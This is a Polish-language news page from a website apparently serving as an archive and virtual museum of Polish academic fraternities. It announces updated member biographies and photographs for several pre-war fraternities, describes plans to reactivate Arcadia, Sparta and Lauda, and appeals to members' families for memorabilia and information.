Będziemy wdzięczni za wszelkie uwagi, informacje, korekty i materiały dotyczące zarówno wyżej wymienionych korporacji, jak także innych polskich korporacji akademickich oraz ich członków. Zależałoby nam w szczególności na: (dodatkowych) informacjach biograficznych, indywidualnych fotografiach tych osób (jeśli możliwe z okresu studenckiego i najlepiej w czapce korporacyjnej, w przypadku skanów tych zdjęć optymalny zapis w formacie TIFF i rozdzielczości 600 dpi), na opowieściach i anegdotach związanych tak z samymi korporacjami, jak i ich członkami, zdjęciach i innych pamiątkach korporacyjnych bądź ich reprodukcjach (vide Poszukiwania), a także kontaktach do rodzin zmarłych członków korporacji. Dziękujemy za wszelką pomoc!

_________________________________________________________________________________________

NN, członek K! Znicz, Dorpat 1904 r.

Aktualizacja stron Lechicji, Sarmatii i Jagiellonii w wirtualnym Muzeum Polskich Korporacji Akademickich.

W wirtualnym Muzeum Korporacyjnym zaktualizowano i wzbogacono podstrony poświęcone korporacjom Lechicja, Sarmatia i Jagiellonia. Związki te powstały jeszcze w okresie zaborów w Dorpacie, Petersburgu i Wiedniu i należały w okresie międzywojennym do najstarszych, największych i najbardziej prężnych polskich korporacji akademickich.

Herb Jagiellonii, 1930 r.

Na podstawie zgromadzonych w Archiwum danych biograficznych, w ramach aktualizacji umieszczono ok. 800 biogramów oraz ok. 80 indywidualnych fotografii członków Lechicji, Sarmatii i Jagiellonii. Poszerzono także rys historyczny tych związków oraz dodano kolejne archiwalne zdjęcia.

Bal XXX-lecia Sarmacji, Warszawa 5 II 1938 r.

Poszukujemy kontaktów do rodzin członków tych korporacji, w szczególności tych zmarłych Lechitów, Sarmatów i Jagiellonów, w odniesieniu do których brak informacji biograficznych, są one bardzo niekompletne bądź brakuje jakiejkolwiek czy w każdym razie dobrej jakości fotografii. Zależałoby nam także na opowieściach i anegdotach związanych tak z samymi korporacjami, jak i ich członkami, zdjęciach i innych pamiątkach bądź ich reprodukcjach (vide Poszukiwania). Za wszelką pomoc będziemy wdzięczni (vide Kontakt)!

_________________________________________________________________________________________

Reaktywacja Korporacji Arcadia w Krakowie i Korporacji Sparta w Warszawie

Młodzi korporanci, Poznań 25 IV 2009 r.

W związku z planowanymi na 2010 rok reaktywacjami korporacji Arcadia i Sparta, w wirtualnym Muzeum Korporacyjnym zaktualizowano i wzbogacono podstrony im poświęcone. Umieszczono nowe wiadomości o historii obu korporacji, ilustrujące je fotografie, a także - tam gdzie było to możliwe - biogramy i fotografie przedwojennych członków Arcadii i Sparty.

Arcadia, 1929 (?).

Korporacja Arcadia została założona w Krakowie w 1924 r. w Czytelni Akademickiego Związku Sportowego przez zżytą ze sobą grupę sportowców zrzeszonych w miejscowym AZS, która „odczuła niedosyt wypełnienia życia tylko sportem i zapragnęła treści intelektualnych zgodnie z zasadą in corpore sana – mens sana” (szerzej vide K! Arcadia). Z kolei Korporację Sparta zawiązało w Warszawie 1922 r. dziesięciu studentów, w większości czynnych instruktorów harcerskich zajmujących wyższe stanowiska w Komendzie Chorągwi Warszawskiej i w Naczelnictwie Związku Harcerstwa Polskiego (szerzej vide K! Sparta).

Karykatura Władysława Rodowicza, 1935 r.

Zgody na reaktywację obu korporacji udzieli w latach 2006-2009 - dzięki kontaktom nawiązanym przez nasze Archiwum - ostatni żyjący członkowie Arcadii i Sparty. Wysiłku podjęcia się prac reaktywacyjnych podjęła się poznańska Korporacja Magna-Polonia. Aktywne prace nad reaktywacją Arcadii trwają od lata 2009 r., natomiast zintensyfikowanie starań zmierzających do odrodzenia Sparty nastąpiło w końcu 2009 r.

W związku z trwającymi pracami reaktywacyjnymi zapraszamy wszystkich zainteresowanych studentów z Krakowa i Warszawy. Prosimy o kontakt!

Szczególnie serdecznie prosimy o kontakt także członków Rodzin przedwojennej Arcadii i Sparty. Zależałoby nam na informacjach biograficznych o zmarłych członkach korporacji, na opowieściach i anegdotach związanych tak z samymi korporacjami, jak i ich członkami, fotografiach i innych pamiątkach bądź ich reprodukcjach. Będziemy wdzięczni za wszystko, co może wzbogacić naszą wiedzę o obu korporacjach, jak także przyczynić się do ich odrodzenia na wyższych uczelniach Krakowa i Warszawy.

_________________________________________________________________________________________

Aktualizacja stron Laudy, Arkonii i Samogitii w wirtualnym Muzeum Polskich Korporacji Akademickich.

Dekiel Laudy Zbigniewa Łukowskiego.

W związku z planowaną reaktywacją kowieńskiej korporacji Lauda, w wirtualnym Muzeum Korporacyjnym zaktualizowano i wzbogacono podstronę jej poświęconą. W szczególności umieszczono biogramy jej członków oraz kilkadziesiąt indywidualnych fotografii Laudan (vide Lauda).

Stanisław Brzozowski, Arkon i Ludanin, 1929 r.

Podobnym zmianom uległy opracowania poświęcone najbliższym i najbardziej związanym z Laudą korporacjom: Arkonii i Samogitii. W tych ramach dodano ponad sto fotografii i biogramów członków Arkonii i Samogitii.

Poszukujemy kontaktów do rodzin członków tych korporacji, w szczególności tych zmarłych Laudan, Arkonów i Samogitów, w odniesieniu do których brak informacji biograficznych, są one bardzo niekompletne bądź brakuje jakiejkolwiek czy w każdym razie dobrej jakości fotografii. Zależałoby nam także na opowieściach i anegdotach związanych tak z samymi korporacjami, jak i ich członkami, zdjęciach i innych pamiątki bądź ich reprodukcjach (vide Kontakt).

Osoby zainteresowany reaktywacją Laudy mogą znaleźć aktualne informacje na stronie reaktywacji Laudy bądź zwrócić się bezpośrednio do prowadzącego prace reaktywacyjne Konwentu Polonia.

Listownik Samogitii, 1931 r.

_________________________________________________________________________________________

Nowe korporacje w Muzeum Polskich Korporacji Akademickich

Strona główna witryny Archiwum Korporacyjnego - Archiwum i Muzeum Polskich Korporacji Akademickich

W ciągu najbliższych dwóch miesięcy strona internetowa Archiwum Korporacyjnego ulegnie znacznemu rozszerzeniu.

W ramach prowadzonych prac dodanych zostanie 11 podstron poświęconych dotychczas nie przedstawionym szerzej na stronie korporacjom: wileńskim (KONWENT POLONIA, CONCORDIA VILNENSIS), warszawskim (VARSOVIA, CASSUBIA), poznańskim (HELIONIA, DEMETRIA), krakowskim (LAUDA, PRAETORIA), lwowskiej LUTYCYI, gdańskiej ROSEVII oraz lubelskiej ASTREI.

W związku z podjętymi pracami będziemy wdzięczni za pomoc, a w szczególności za wszelkie materiały i informacje dotyczące zarówno wyżej wymienionych korporacji, jak także dotychczas nie przedstawionych na stronie Muzeum polskich korporacji akademickich (vide “Pozostałe” w Muzeum Korporacyjne). Prosimy także o nadsyłanie biogramów przedwojennych członków korporacji.

Wszystkim osobom, które przyczyniły i przyczynią się do tego rozszerzenia witryny Muzeum Polskich Korporacji Akademickich jesteśmy bardzo zobowiązani!

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }